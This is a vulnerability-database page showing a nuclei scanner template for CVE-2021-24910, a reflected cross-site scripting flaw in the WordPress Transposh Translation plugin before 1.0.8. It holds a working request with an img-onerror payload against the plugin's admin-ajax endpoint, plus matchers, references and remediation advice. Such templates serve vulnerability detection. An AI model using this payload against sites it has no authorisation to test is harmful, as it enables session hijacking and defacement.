Lucene search
K

WordPress Transposh Translation <1.0.8 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

WordPress Transposh Translation <1.0.8 - Cross-Site Scripting. Reflected XSS vulnerabilit

Related
Refs
Code
id: CVE-2021-24910

info:
  name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting
  author: Screamy
  severity: medium
  description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability.
  reference:
    - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
    - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24910
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24910
    cwe-id: CWE-79
    epss-score: 0.01266
    epss-percentile: 0.66204
    cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: transposh
    product: transposh_wordpress_translation
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>'
          - '{"result":'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220551d99fe2baa02f6ed9116cc33cd183846ce3948c6f326fd7ef2208341170db2022100f20de9d4e91feec1f44e288bbc1214cbc6d4661f8db5134ec6be068304a2b1b1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
EPSS0.01266
41